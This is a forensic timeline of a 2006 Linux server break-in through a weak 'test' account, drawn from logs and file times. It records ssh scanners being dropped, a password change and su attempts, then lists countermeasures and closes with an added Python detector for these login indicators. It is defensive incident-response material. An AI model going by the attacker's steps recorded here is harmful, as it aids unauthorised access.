2006/03/06 22:40:54	82.79.137.22	*!	Mar 06 06 22:40:54   167818 m.. -rw-r--r-- test     test     /home/test/scaner/207.44.pscan.22
2006/03/06 23:12:35	82.79.137.22	*!	Mar 06 06 23:12:35   846832 m.. -rwxr-xr-x test     test     /home/test/scaner/ssh-scan
2006/03/06 23:23:56	82.79.137.22	*!	Mar 06 06 23:23:56    23714 m.. -rwxr-xr-x test     test     /home/test/scaner/go
2006/03/06 00:03:34	82.79.137.22	*!	Mar 07 06 00:03:34   846520 m.. -rwxr-xr-x test     test     /home/test/scaner/sshf
2006/03/06 00:03:34	82.79.137.22	*!	                       4096 m.. drwxr-xr-x test     test     /home/test/scaner
2006/03/06 00:03:34	82.79.137.22	*!	                     458068 m.. -rwxr-xr-x test     test     /home/test/scaner/ss
						skycode  pts/3        213.186.53.55    Tue Mar  7 00:14 - down   (00:45)
2006/03/07 00:21:24	82.79.137.22	*	Mar  7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test
						skycode  pts/2        213.186.53.55    Tue Mar  7 00:58 - down   (00:01)
						runlevel (to lvl 6)   Tue Mar  7 00:59 - 00:59  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 00:59 - 01:02  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 01:02 - 08:45  (07:42)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 01:02 - 08:45  (07:42)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 01:04 - 01:04  (00:00)     213.186.53.55
						skycode  pts/0        Tue Mar  7 08:28 - down   (00:16)     213.186.53.55
						runlevel (to lvl 6)   Tue Mar  7 08:45 - 08:45  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 08:45 - 08:48  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 08:48 - 09:18  (00:30)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 08:48 - 09:18  (00:30)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 08:56 - down   (00:22)     213.186.53.55
						skycode  pts/1        Tue Mar  7 09:17 - down   (00:01)     213.186.53.55
						runlevel (to lvl 6)   Tue Mar  7 09:18 - 09:18  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:18 - 09:22  (00:03)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:22 - 09:25  (00:03)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:22 - 09:25  (00:03)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 09:23 - down   (00:01)     217.136.140.81
						runlevel (to lvl 6)   Tue Mar  7 09:25 - 09:25  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:25 - 09:28  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:28 - 09:44  (00:15)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:28 - 09:44  (00:15)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 09:34 - down   (00:09)     217.136.140.81
						runlevel (to lvl 6)   Tue Mar  7 09:44 - 09:44  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:44 - 09:48  (00:04)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:48 - 01:03 (12+15:14)   2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:48 - 01:03 (12+15:14)   2.4.27-2-386


2006/03/09 14:57:31	82.79.137.27	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client 		"82.79.137.27"
2006/03/09 14:57:31	82.79.137.26	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client 		"82.79.137.26"
2006/03/09 14:57:31	82.79.137.28	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client 		"82.79.137.28"
2006/03/09 14:57:31	82.79.137.7	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client 		"82.79.137.7"
2006/03/09 14:57:33	82.79.137.28	*	vsftpd: Thu Mar  9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client 		"82.79.137.28"
2006/03/09 14:57:33	82.79.137.30	*	vsftpd: Thu Mar  9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client 		"82.79.137.30"
2006/03/09 15:01:29	82.79.137.30		30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:30	82.79.137.30		30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:34	82.79.137.6		Mar  9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6
2006/03/09 15:01:36	82.79.137.6		vsftpd: Thu Mar  9 15:01:36 2006 [pid 5944] [anonymous] FAIL LOGIN: Client 	"82.79.137.6"
2006/03/09 15:01:37	82.79.137.27		Mar  9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/09 15:01:39	82.79.137.27		vsftpd: Thu Mar  9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client 	"82.79.137.27"
2006/03/09 15:01:45	82.79.137.18	*	vsftpd: Thu Mar  9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client 		"82.79.137.18"
2006/03/09 15:01:47	82.79.137.9	*	vsftpd: Thu Mar  9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client 		"82.79.137.9"
2006/03/09 15:02:07	82.79.137.20		20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:08	82.79.137.20		20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:35	82.79.137.18		18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:36	82.79.137.18		18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"


						ratibus  pts/2        82.233.38.20     Thu Mar 16 23:13 - 23:14  (00:00)
2006/03/17 00:12:32	193.230.222.209	*	Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
2006/03/17 00:12:32	193.230.222.209	*	Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:12	193.230.222.209	*	test     pts/2        193.230.222.209  Fri Mar 17 00:12 - 00:30  (00:18)
2006/03/17 00:12:45	193.230.222.209	*!!	Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
2006/03/17 00:12:45	193.230.222.209	*!!	Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed
2006/03/17 00:15:35	193.230.222.209	*	Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2
2006/03/17 00:15:35	193.230.222.209	*	Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:15	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 00:15 - 00:15  (00:00)
2006/03/17 00:15:52	193.230.222.209	*	Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test
2006/03/17 00:17:28	193.230.222.209	*.	Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
2006/03/17 00:17:30	193.230.222.209	*.	Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure
2006/03/17 00:17:30	193.230.222.209	*.	Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj
2006/03/17 00:17:36	193.230.222.209	*.	Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
2006/03/17 00:17:38	193.230.222.209	*.	Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure
2006/03/17 00:17:38	193.230.222.209	*.	Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj
2006/03/17 00:18:42	193.230.222.209	.*	Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net  user=croulants
2006/03/17 00:18:45	193.230.222.209	.*	Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:51	193.230.222.209	.*	Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:59	193.230.222.209	.*	Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10	193.230.222.209	.*	Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10	193.230.222.209	.*	Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
2006/03/17 00:19:50	193.230.222.209	*.	Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:19:52	193.230.222.209	*.	Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure
2006/03/17 00:19:52	193.230.222.209	*.	Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
2006/03/17 00:19:57	193.230.222.209	*.	Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:19:59	193.230.222.209	*.	Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure
2006/03/17 00:19:59	193.230.222.209	*.	Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours
2006/03/17 00:20:04	193.230.222.209	*.	Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:20:06	193.230.222.209	*.	Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure
2006/03/17 00:20:06	193.230.222.209	*.	Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours
2006/03/17 00:26:26	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:27	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:28	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:28:33	193.230.222.209	*	Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
2006/03/17 00:28:33	193.230.222.209	*	Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:28	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 00:28 - 00:30  (00:01)
2006/03/17 00:28:40	193.230.222.209	*!	Mar 17 06 00:28:40        0 ..c crw--w---- test     tty      /dev/pts/5
2006/03/17 00:29:02	193.230.222.209	*!	Mar 17 06 00:29:02        0 .a. crw--w---- test     tty      /dev/pts/5
2006/03/17 00:30:31	193.230.222.209	*	Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test
2006/03/17 00:30:33	193.230.222.209	*	Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test
						Mar 17 06 06:35:02        0 m.c prw-r----- root     adm      /dev/xconsole

2006/03/17 09:00:52	193.230.222.209	*	Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2
2006/03/17 09:00:52	193.230.222.209	*	Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 09:00	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 09:00 - 09:38  (00:37)
2006/03/17 09:03:43	193.230.222.209	*!	Mar 17 06 09:03:43        0 ..c crw--w---- test     tty      /dev/pts/6
2006/03/17 09:03:58	193.230.222.209	*!	Mar 17 06 09:03:58        0 .a. crw--w---- test     tty      /dev/pts/6
2006/03/17 09:38:33	193.230.222.209	*	Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test

2006/03/17 12:19:43	193.230.222.209	*	Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2
2006/03/17 12:19:43	193.230.222.209	*	Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:19	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 12:19 - 14:25  (02:05)
2006/03/17 12:26:01	193.230.222.209	*	Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2
2006/03/17 12:26:01	193.230.222.209	*	Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:26	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 12:26 - 14:30  (02:04)
2006/03/17 12:32:44	193.230.222.209	*	Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2
2006/03/17 12:32:44	193.230.222.209	*	Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:32	193.230.222.209	*	test     pts/7        193.230.222.209  Fri Mar 17 12:32 - 16:26  (03:53)
2006/03/17 14:25:38	193.230.222.209	*	Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test
2006/03/17 14:30:58	193.230.222.209	*	Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test
2006/03/17 14:36:43	193.230.222.209	*	Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2
2006/03/17 14:36:43	193.230.222.209	*	Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 14:36	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 14:36 - 16:49  (02:12)
2006/03/17 14:59:56	193.230.222.209	*	Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2
2006/03/17 14:59:56	193.230.222.209	*	Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:00	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 15:00 - 17:12  (02:12)
2006/03/17 15:03:26	193.230.222.209	*	Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2
2006/03/17 15:03:26	193.230.222.209	*	Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:03	193.230.222.209	*	test     pts/8        193.230.222.209  Fri Mar 17 15:03 - 15:14  (00:10)
2006/03/17 15:14:06	193.230.222.209	*	Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test
2006/03/17 16:26:40	193.230.222.209	*	Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test
2006/03/17 16:49:15	193.230.222.209	*	Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test
2006/03/17 17:12:46	193.230.222.209	*	Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test
2006/03/17 17:18			#	## First mails blocked... no contact outside is possible via the default IP source
						Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2
						skycode  pts/3        213.49.238.76    Fri Mar 17 19:30   still logged in
						Mar 17 06 19:30:39        0 ..c crw--w---- skycode  tty      /dev/pts/3
						Mar 17 19:30:50 localhost sudo:  skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
						Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2
						skycode  pts/4        213.49.238.76    Fri Mar 17 19:33   still logged in
						Mar 17 06 19:33:45        0 ..c crw--w---- skycode  tty      /dev/pts/4
						Mar 17 19:34:41 localhost sudo:  skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash
2006/03/17 19:37:19			 !	Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test
						Mar 17 06 19:38:16        0 ..c crw--w---- root     tty      /dev/pts/7
2006/03/17 19:39:21			 !!	Mar 17 06 19:39:21     2467 m.c -rw-r----- root     shadow   /etc/shadow		= test:$ passwd?
2006/03/17 19:39:21			 !!	Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test
2006/03/17 19:39:21			 !!	Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed
2006/03/17 19:40:12			 !	Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test

2006/03/17 19:40:19			 !	Mar 17 06 19:40:19     4096 m.. drwxr-xr-x test     test     /home/test
2006/03/17 19:40:19			 !	                       4096 m.. drwx------ test     test     /home/test/.mc/cedit	= test:$ mc?
2006/03/17 19:40:25			 !	Mar 17 06 19:40:25        0 m.. -rw-r--r-- test     test     /home/test/.mc/history	but test not logged in normally
2006/03/17 19:40:25			 !	                         35 m.. -rw-r--r-- test     test     /home/test/.mc/Tree	or via ./go??
2006/03/17 19:40:25			 !	                       4096 m.. drwxr-xr-x test     test     /home/test/.mc
2006/03/17 19:40:25			 !	                         32 m.. -rw-r--r-- test     test     /home/test/.mc/filepos
						=> /tmp/crontab.Hq7als/crontab 1;0
						=> correspond to crontab -e in .bash_history?...
2006/03/17 19:40:25			 !	                       1945 m.. -rw-r--r-- test     test     /home/test/.mc/ini
2006/03/17 19:40:31			 !	Mar 17 06 19:40:31     2117 m.. -rw------- test     test     /home/test/.bash_history
						phil     pts/8        85.234.194.12    Fri Mar 17 20:08 - 20:19  (00:11)
						phil     pts/8        85.234.194.12    Fri Mar 17 20:20   still logged in
						phil     pts/14       85.234.194.12    Fri Mar 17 21:14   still logged in
						skycode  pts/15       213.49.238.76    Fri Mar 17 21:39   still logged in
						Mar 17 06 21:05:08        0 m.. crw--w---- root     tty      /dev/pts/12
						                          0 m.. crw------- phil     tty      /dev/pts/8
						Mar 17 06 21:05:09        0 m.. crw--w---- test     tty      /dev/pts/5
						Mar 17 06 21:05:10        0 ma. crw-rw-rw- root     tty      /dev/ptmx
						                          0 m.. crw--w---- test     tty      /dev/pts/6
						                          0 .a. crw------- phil     tty      /dev/pts/8
						                          0 .a. crw-rw-rw- root     tty      /dev/tty
2006/03/17 21:10:59			 #	user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1
2006/03/17 21:10:59			 #	user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1
2006/03/17 21:28:56			 #	Mar 17 21:28:56 localhost -- MARK --
2006/03/17 21:30:03			 #	last occurrence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0
2006/03/17 21:30:03			 #	last occurrence of 20060317 213003 probe ended
2006/03/17 21:45:04			 #	Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:45:04			 #	Mar 17 21:45:04 localhost last message repeated 3 times
2006/03/17 21:48:56			 #	## No MARK at 21:48:56
2006/03/17 21:50:05			 #	Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:55			 #	## No snmp at 21:55

TODO:
=====
ftp repository of test??
/var/cache/tct

Conclusions

  • Initial breach
    • an automated tool scanning ftp accounts was able to log in with the 'test' account
    • manual attempt to log in with the 'test' account
    • download of sniffers and brute-force tools for ssh
    • transfers over ftp
    • change test password
    • 82.79.137.NN = NN.metronetwork.rdsbz.ro
    • 193.230.222.209 = 209-nat.s-man.net
  • Counter-measures
    • don't use dummy passwords ;-)
    • don't grant ftp/ssh rights by default
      sshd: make use of the "AllowUsers" keyword and explicitly add users when needed
    • don't grant internet access by default
      iptables: cf --uid-owner and the other --XXX-owner options
      on the OUTPUT chain to block downloads of malicious code
      on the INPUT chain to block bindshells
  • Timeline
    • Before and during the live forensic analysis we should have written down our own actions and the observable elements rather than having to deduce them from the logs.
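The two indicators that open the timeline above (the 'test' ssh login followed 13 seconds later by a password change, then the repeated failed su attempts to other accounts from that session) can be picked out of auth.log automatically rather than by hand. This is an added example, not part of the wiki page: the log lines are constructed from the ones quoted above, and the 15-minute window and the threshold of 3 failures are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample, modelled on the auth.log lines quoted in the timeline (not the original evidence).
SAMPLE_LOG = """\
Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
Mar 17 20:08:11 localhost sshd[9901]: Accepted keyboard-interactive/pam for phil from 85.234.194.12 port 4100 ssh2
"""

STAMP = r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ "
ACCEPTED = re.compile(STAMP + r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port")
PASSWD = re.compile(STAMP + r"passwd\[\d+\]: \(pam_unix\) password changed for (\S+)")
SU_FAIL = re.compile(STAMP + r"su\[\d+\]: \(pam_unix\) authentication failure;.* logname=(\S+) .* user=(\S+)")

def parse_stamp(stamp, year):
    # syslog stamps carry no year; the caller supplies it (2006 for this incident)
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def find_indicators(log, year=2006, window=timedelta(minutes=15), su_threshold=3):
    """Return one alert string per indicator: a password change shortly after an ssh
    login for the same account, and a burst of failed su attempts by one logname."""
    last_login = {}   # account -> (time, source address) of its latest accepted ssh login
    su_failures = {}  # logname -> [(time, target account), ...] inside the window
    alerts = []
    for line in log.splitlines():
        if m := ACCEPTED.match(line):
            last_login[m[2]] = (parse_stamp(m[1], year), m[3])
        elif m := PASSWD.match(line):
            t, account = parse_stamp(m[1], year), m[2]
            if account in last_login and t - last_login[account][0] <= window:
                delay = int((t - last_login[account][0]).total_seconds())
                alerts.append(f"{account}: password changed {delay}s after ssh login from {last_login[account][1]}")
        elif m := SU_FAIL.match(line):
            t, logname, target = parse_stamp(m[1], year), m[2], m[3]
            recent = [f for f in su_failures.get(logname, []) if t - f[0] <= window] + [(t, target)]
            su_failures[logname] = recent
            if len(recent) == su_threshold:   # fire once, when the burst reaches the threshold
                targets = sorted({f[1] for f in recent})
                alerts.append(f"{logname}: {su_threshold} failed su attempts within {window} to {targets}")
    return alerts

if __name__ == "__main__":
    for alert in find_indicators(SAMPLE_LOG):
        print(alert)
```

Run against the real auth.log the same way the wiki's timeline was built; the second login in the sample (phil) produces nothing, showing the rules only fire on the correlated pattern, not on logins alone.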